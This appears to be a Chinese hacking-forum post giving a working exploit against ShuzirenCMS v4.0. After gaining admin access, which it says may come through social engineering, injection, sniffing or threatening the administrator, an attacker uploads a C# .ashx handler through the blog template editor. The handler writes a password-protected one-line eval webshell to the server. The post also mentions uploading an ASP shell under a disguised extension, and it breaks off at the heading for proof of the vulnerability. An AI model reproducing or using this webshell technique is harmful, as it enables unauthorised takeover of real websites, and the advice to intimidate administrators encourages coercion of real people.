此漏洞由http://www.t00ls.net/thread-19609-1-1.html引起
楼主Pm我网址后简单看下... 发现Asp Php脚本权限封得死死的整个网站的目录任何一个都不给写入~
测试环境/系统:
数字信息港内容管理系统ShuzirenCMS v4.0 / Windows
不管你社工,自己挖注入,嗅探,恐吓后台管理员要密码 反正要后台权限...
登入后台 > 博客 > 模板管理 > 编辑
上传1.ashx
1.ashx内容:
<%@ WebHandler Language="C#" Class="Handler" %>
using System;
using System.Web;
using System.IO;
public class Handler : IHttpHandler {
public void ProcessRequest (HttpContext context) {
context.Response.ContentType = "text/plain";
string show="<% @Page Language=\"Jscript\"%"+"><%eval(Request.Item"+"[\"RmB321654897123456789\"]"+",\"unsafe\");%>Hey web master,Have a nice day o.O? I hope so! HaHa";
StreamWriter file1= File.CreateText(context.Server.MapPath("4z1.aspx"));
file1.Write(show);
file1.Flush();
file1.Close();
}
public bool IsReusable {
get {
return false;
}
}
}
访问后生成的一句话路径:
http://路径/4z1.aspx
密码:
RmB321654897123456789
另一个是如果asp权限可写文件
上传aasasa后缀的aspshell
漏洞证明: